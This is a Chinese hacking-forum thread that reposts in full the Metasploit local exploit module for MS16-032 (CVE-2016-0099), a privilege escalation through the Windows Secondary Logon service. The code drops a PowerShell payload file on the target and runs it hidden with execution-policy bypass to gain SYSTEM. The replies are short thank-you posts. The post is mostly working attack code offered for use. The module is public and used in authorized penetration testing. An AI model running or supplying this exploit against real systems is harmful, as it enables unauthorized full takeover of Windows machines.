查看: 89094|回复: 3958

Windows 7 / 10 and 2k8-2k12 x86/x64 Secondary Logon Handle Privilege Escalati...

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2016-7-19 13:39:10 | 显示全部楼层 |阅读模式
    Windows 7 / 10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)
    [C] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
      
    require 'msf/core'
    require 'msf/core/payload_generator'
    require 'msf/core/exploit/powershell'
    require 'rex'
      
    class MetasploitModule < Msf::Exploit::Local
      
      Rank = NormalRanking
      
      include Msf::Exploit::Powershell
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::Process
      include Msf::Post::File
      include Msf::Post::Windows::ReflectiveDLLInjection
      
      def initialize(info = {})
        super(update_info(info,
          'Name'          => 'MS16-032 Secondary Logon Handle Privilege Escalation',
          'Description'   => %q{
            This module exploits the lack of sanitization of standard handles in Windows' Secondary
            Logon Service.  The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
            32 and 64 bit.  This module will only work against those versions of Windows with
            Powershell 2.0 or later and systems with two or more CPU cores.
          },
           'License'       => BSD_LICENSE,
           'Author'        =>
             [
               'James Forshaw', # twitter.com/tiraniddo
               'b33f',          # @FuzzySec, [url]http://www.fuzzysecurity.com[/url]'
               'khr0x40sh'
             ],
           'References'    =>
             [
               [ 'MS', 'MS16-032'],
               [ 'CVE', '2016-0099'],
               [ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
               [ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
             ],
            'DefaultOptions' =>
              {
                'WfsDelay' => 30,
                'EXITFUNC' => 'thread'
              },
            'DisclosureDate' => 'Mar 21 2016',
            'Platform'      => [ 'win' ],
            'SessionTypes'  => [ 'meterpreter' ],
            'Targets'        =>
              [
                # Tested on (32 bits):
                # * Windows 7 SP1
                [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
                # Tested on (64 bits):
                # * Windows 7 SP1
                # * Windows 8
                # * Windows 2012
                [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
              ],
            'DefaultTarget' => 0
          ))
      
        register_advanced_options(
          [
            OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
            OptBool.new(  'DRY_RUN', [false, 'Only show what would be done', false ]),
            # How long until we DELETE file, we have a race condition here, so anything less than 60
            # seconds might break
            OptInt.new('TIMEOUT', [false, 'Execution timeout', 60])
          ], self.class)
      end
      
      def get_arch
        arch = nil
      
        if sysinfo["Architecture"] =~ /(wow|x)64/i
          arch = ARCH_X86_64
        elsif sysinfo["Architecture"] =~ /x86/i
          arch = ARCH_X86
        end
      
        arch
      end
      
      def check
        os = sysinfo["OS"]
      
        if os !~ /win/i
          # Non-Windows systems are definitely not affected.
          return Exploit::CheckCode::Safe
        end
      
        Exploit::CheckCode::Detected
      end
      
      def exploit
        if is_system?
          fail_with(Failure::None, 'Session is already elevated')
        end
      
        arch1 = get_arch
        if check == Exploit::CheckCode::Safe
          print_error("Target is not Windows")
          return
        elsif arch1 == nil
          print_error("Architecture could not be determined.")
          return
        end
      
        # Exploit PoC from 'b33f'
        ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1')
        vprint_status("PS1 loaded from #{ps_path}")
        ms16_032 = File.read(ps_path)
      
        cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
      
        if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
          cmdstr.gsub!("System32","SYSWOW64")
          print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
          vprint_warning("#{cmdstr}")
        end
      
        # payload formatted to fit dropped text file
        payl = cmd_psh_payload(payload.encoded,payload.arch,{
          encode_final_payload: false,
          remove_comspec: true,
          method: 'old'
        })
      
        payl.sub!(/.*?(?=New-Object IO)/im, "")
        payl = payl.split("';$s.")[0]
        payl.gsub!("''","'")
        payl = "$s=#{payl}while($true){Start-Sleep 1000};"
      
        @upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
        path = datastore['W_PATH'] || pwd
        @upfile = "#{path}\\#{@upfile}"
        fd = session.fs.file.new(@upfile,"wb")
        print_status("Writing payload file, #{@upfile}...")
        fd.write(payl)
        fd.close
        psh_cmd = "IEX `$(gc #{@upfile})"
      
        #lpAppName
        ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
        #lpcommandLine - capped at 1024b
        ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")
      
        print_status('Compressing script contents...')
        ms16_032_c = compress_script(ms16_032)
      
        if ms16_032_c.size > 8100
          print_error("Compressed size: #{ms16_032_c.size}")
          error_msg = "Compressed size may cause command to exceed "
          error_msg += "cmd.exe's 8kB character limit."
          print_error(error_msg)
        else
          print_good("Compressed size: #{ms16_032_c.size}")
        end
      
        if datastore['DRY_RUN']
          print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}")
          return
        end
      
        print_status("Executing exploit script...")
        cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}"
        args = nil
      
        begin
          process = session.sys.process.execute(cmd, args, {
            'Hidden' => true,
            'Channelized' => false
          })
        rescue
          print_error("An error occurred executing the script.")
        end
      end
      
      def cleanup
        sleep_t = datastore['TIMEOUT']
        vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...")
        sleep sleep_t
      
        begin
          rm_f(@upfile)
          print_good("Cleaned up #{@upfile}")
        rescue
          print_error("There was an issue with cleanup of the powershell payload script.")
        end
      end
    end
    回复

    使用道具 举报

    该用户从未签到

    发表于 2016-7-19 14:52:15 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-7-19 14:56:10 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-7-19 15:46:59 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-7-19 18:25:50 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2016-7-19 20:22:17 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-7-19 20:22:18 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-7-19 20:46:56 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-7-20 00:14:00 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-7-20 07:14:35 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-21 22:17 , Processed in 0.100380 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部